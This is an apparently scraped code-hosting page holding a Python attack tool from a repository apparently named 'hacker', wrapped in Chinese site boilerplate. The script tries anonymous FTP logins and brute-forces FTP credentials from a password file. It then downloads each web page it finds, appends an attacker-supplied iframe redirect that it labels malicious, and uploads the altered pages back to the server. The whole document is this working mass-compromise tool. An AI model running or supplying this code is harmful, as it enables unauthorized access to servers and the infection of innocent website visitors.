代码拉取完成,页面将自动刷新
同步操作将从 Fos/hacker 强制同步,此操作会覆盖自 Fork 仓库以来所做的任何修改,且无法恢复!!!
确定后同步将在后台操作,完成时将刷新页面,请耐心等待。
# coding=UTF-8
import ftplib
import optparse
import time
def anonLogin(hostname):
try:
ftp = ftplib.FTP(hostname)
ftp.login('anonymous','me@your.com')
print('\n[*] ' + str(hostname) + ' FTP Anonymous Logon Succeeded!')
ftp.quit()
return True
except Exception as e:
print('\n[-] ' + str(hostname) + ' FTP Anonymous Logon Failed!')
return False
def bruteLogin(hostname, passwdFile):
pF = open(passwdFile, 'r')
for line in pF.readlines():
userName = line.split(':')[0]
passWord = line.split(':')[1].strip('\r').strip('\n')
try:
ftp = ftplib.FTP(hostname)
ftp.login(userName,passWord)
print('\n[*] ' + str(hostname) + ' FTP Anonymous Logon Succeeded:' + userName +'/' + passWord)
ftp.quit()
return (userName,passWord)
except Exception as e:
pass
print('\n[-] Could not brute force FTP credentials.')
return (None, None)
def returnDefault(ftp):
try:
dirList = ftp.nlst()
except:
dirList = []
print('[-] Could not list directory contents.')
print('[-] Skipping To Next Target.')
return
retList = []
for fileName in dirList:
fn = fileName.lower()
if '.php' in fn or '.html' in fn or '.asp' in fn:
print('[+] Found default page:' + fileName)
retList.append(fileName)
return retList
def injectPage(ftp, page, redirect):
f = open(page + '.tmp', 'w')
ftp.retrlines('RETR ' + page, f.write)
print('[+] Downloaded Page:'+ page)
f.write(redirect)
f.close()
print('[+] Injected Malicious IFrame on: ' + page)
ftp.storlines('STOR ' + page, open(page + '.tmp'))
print('[+] Uploaded Injected Page: ' + page)
def attack(username, password, tgtHost, redirect):
ftp = ftplib.FTP(tgtHost)
ftp.login(username, password)
defPages = returnDefault(ftp)
for defPage in defPages:
injectPage(ftp, defPage, redirect)
def main():
parser = optparse.OptionParser('usage%prog -H <target host[s]> -r <redirect page> [-f <userpass file>]')
parser.add_option('-H', dest='tgtHosts', type='string', help='specify target host')
parser.add_option('-f', dest='passwdFile', type='string', help='specify user/password file')
parser.add_option('-r', dest='redirect', type='string', help='specify a redirection page')
(options, args) = parser.parse_args()
tgtHosts = str(options.tgtHosts).split(', ')
passwdFile = options.passwdFile
redirect = options.redirect
if tgtHosts == None or redirect == None:
print(parser.usage)
exit(0)
for tgtHost in tgtHosts:
username = None
password = None
attacked = False
if anonLogin(tgtHost) == True:
username = 'anonymous'
password = 'me@your.com'
print('[+] Using Anonymous Creds to attack')
try:
attack(username, password, tgtHost, redirect)
attacked = True
except:
print('[-] Using Anonymous attack Failed!')
pass
if passwdFile != None and not attacked:
(username, password) = bruteLogin(tgtHost, passwdFile)
if password != None:
print('[+] Using Creds: ' + username + '/' + password + ' to attack')
attack(username, password, tgtHost, redirect)
if __name__ == '__main__':
main()
此处可能存在不合适展示的内容,页面不予展示。您可通过相关编辑功能自查并修改。
如您确认内容无涉及 不当用语 / 纯广告导流 / 暴力 / 低俗色情 / 侵权 / 盗版 / 虚假 / 无价值内容或违法国家有关法律法规的内容,可点击提交进行申诉,我们将尽快为您处理。